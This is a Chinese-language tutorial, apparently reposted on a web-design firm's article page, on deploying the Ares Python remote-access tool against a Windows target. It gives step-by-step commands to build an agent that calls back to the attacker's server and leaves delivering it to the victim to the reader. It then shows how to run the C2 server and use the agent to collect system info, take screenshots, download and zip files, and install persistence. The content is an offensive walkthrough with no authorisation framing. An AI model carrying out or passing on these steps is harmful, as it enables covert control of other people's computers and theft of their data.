Python中如何使用Ares這個工具

小編給大家分享一下Python中如何使用Ares這個工具，相信大部分人都還不怎么了解，因此分享這篇文章給大家參考一下，希望大家閱讀完這篇文章后大有收獲，下面讓我們一起去了解一下吧！

成都創(chuàng)新互聯(lián)公司是專業(yè)的祿勸網(wǎng)站建設(shè)公司，祿勸接單;提供網(wǎng)站設(shè)計制作、成都網(wǎng)站制作,網(wǎng)頁設(shè)計,網(wǎng)站設(shè)計,建網(wǎng)站,PHP網(wǎng)站建設(shè)等專業(yè)做網(wǎng)站服務(wù);采用PHP框架,可快速的進(jìn)行祿勸網(wǎng)站開發(fā)網(wǎng)頁制作和功能擴(kuò)展;專業(yè)做搜索引擎喜愛的網(wǎng)站,專業(yè)的做網(wǎng)站團(tuán)隊,希望更多企業(yè)前來合作!

安裝

首先，我們需要在攻擊者機(jī)器上安裝該工具。我們直接從GitHub克隆它。完成后，我們通過cd命令遍歷新創(chuàng)建的名為Ares的目錄，如下所示。

git clone //github.com/sweetsoftware/Ares.git
cd Ares
ls

接下來，為了使工具可以正常工作，我們還需要安裝一些依賴項。安裝requirements.txt文件即可，該文件包含了需要安裝的python庫的詳細(xì)信息。

pip install -r requirements.txt

因為我們的目標(biāo)是Windows機(jī)器，因此我們需要編譯與Windows機(jī)器兼容的agent。為此，我們需要先來安裝wine。這里可能需要花費一些時間。

ls
./wine_setup.sh

目標(biāo)利用

至此，我們已成功安裝了運行Ares所需的所有條件。接下來我們就可以來嘗試獲取與目標(biāo)機(jī)器的CNC會話了。想要達(dá)到這個目的，我們還需要一個agent。我們使用cd命令遍歷agent目錄。然后通過ls命令列出文件，找到其中的一個配置文件。我們需要編輯該文件以獲取會話。

cd agent/
ls
nano config.py

可以看到，當(dāng)我們使用nano命令打開配置文件后，其中的SERVER變量處有一個IP地址。我們編輯并將其更改為攻擊者機(jī)器的內(nèi)網(wǎng)IP地址，這里以我的IP（192.168.1.4）為例。其他參數(shù)值我們無需修改，保存并退出nano編輯器。

config文件配置完成后，下面我們來創(chuàng)建一個代理。因為我們的目標(biāo)機(jī)器是Windows，所以我們將使用以下命令創(chuàng)建一個Windows的代理。

./builder.py -p Windows –server //192.168.1.4:8080 -o agent.exe

創(chuàng)建完成后你可以選擇一種你喜歡的方式，將這個代理發(fā)送到目標(biāo)計算機(jī)上。之后，我們需要啟動服務(wù)器。這是必需的，因為代理將與該服務(wù)器通信。讓我們回到Ares目錄。這里有一個名為server的子目錄。在遍歷它之后，我們需要初始化數(shù)據(jù)庫（僅在第一次使用時需要初始化數(shù)據(jù)庫），因為我們將使用initdb參數(shù)。現(xiàn)在，我們將運行服務(wù)器如下圖所示。

ls
cd server/
./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded

現(xiàn)在，我們在瀏覽器中導(dǎo)航到服務(wù)器IP。你將看到一個表單，要求我們設(shè)置一個密碼。輸入完成后，單擊“ Define”繼續(xù)。

接著，會要求我們輸入剛剛設(shè)置的密碼進(jìn)行登錄。

這里我們可以看到Ares GUI的幾個主索引，包括：Change Password，Disconnect，Agent List?，F(xiàn)在，讓我們回到創(chuàng)建代理的那步。只有在目標(biāo)機(jī)器上執(zhí)行代理后，我們才會在Agent List中獲得一個Agent。

正如下圖中所示，我們有一個存活的agent。我們可以看到代理的名稱，狀態(tài)，代理上線時登錄的用戶，同樣我們也有主機(jī)名。我們還獲取到了目標(biāo)的IP和系統(tǒng)類型。這里，我們可以在多個設(shè)備上運行代理，每個設(shè)備都可以在這里被查看到。我們可以從這里選擇會話，同時在多個會話上執(zhí)行相同的命令。讓我們點擊名稱繼續(xù)。

命令執(zhí)行

讓我們先來運行一個systeminfo命令看看。如下所示，我們獲取到了目標(biāo)機(jī)器的所有系統(tǒng)配置信息。

systeminfo

截屏

現(xiàn)在，讓我們來嘗試截取目標(biāo)機(jī)器的屏幕。輸入屏幕截取命令，代理將捕獲屏幕截圖并提供如圖所示的鏈接。打開該鏈接，我們就可以查看到最新的屏幕截圖。

screenshot

文件下載

我們還可以使用該代理從遠(yuǎn)程目標(biāo)下載文件。想要下載文件必須要知道文件名，我們可以使用dir命令獲取文件名。知道文件名后，我們就可以將相應(yīng)的文件下載到我們本地的攻擊機(jī)上，如下圖所示。

download file.txt

壓縮文件

我們可以使用Ares agent壓縮遠(yuǎn)程目標(biāo)上的目錄。同樣需要目錄名。提取目錄名后，我們可以使用以下命令遠(yuǎn)程壓縮文件。這里的'sample'是目錄的名稱，'compressed.zip'是壓縮文件的名稱。

zip compressed.zip sample

持久化代理

我們可以使用persist命令來調(diào)用代理中的persistence。該命令會在遠(yuǎn)程目標(biāo)上安裝代理。

persist

Clean Up

最后任務(wù)完成后，我們可以使用clean命令從目標(biāo)計算機(jī)中刪除代理。

clean

以上是“Python中如何使用Ares這個工具”這篇文章的所有內(nèi)容，感謝各位的閱讀！相信大家都有了一定的了解，希望分享的內(nèi)容對大家有所幫助，如果還想學(xué)習(xí)更多知識，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道！

網(wǎng)站題目：Python中如何使用Ares這個工具
轉(zhuǎn)載來源：http://muchs.cn/article44/gpppee.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供微信小程序、Google、自適應(yīng)網(wǎng)站、響應(yīng)式網(wǎng)站、網(wǎng)站收錄、虛擬主機(jī)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)